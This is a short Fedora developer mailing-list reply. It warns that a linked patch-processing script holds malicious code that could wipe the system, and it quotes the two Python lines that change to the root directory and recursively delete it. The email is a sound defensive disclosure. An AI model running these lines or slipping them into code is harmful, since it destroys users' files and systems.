On Fri, Jul 04, 2014 at 04:26:07PM +0200, Sandro Mani wrote:

>  * A script automating most of the process of validating and processing the
> request can be found at
> 
> https://github.com/manisandro/fedora-process-simple-patch/blob/master/process-simple-patch.py

Do not run this script, because it contains malicious code that
might remove all files from your system! The code can be found in lines
301-302:

| 301   os.chdir("/")
| 302   shutil.rmtree(os.getcwd())

Kind regards
Till
-- 
devel mailing list
devel@lists.fedoraproject.org
https://admin.fedoraproject.org/mailman/listinfo/devel
Fedora Code of Conduct: http://fedoraproject.org/code-of-conduct

Reply via email to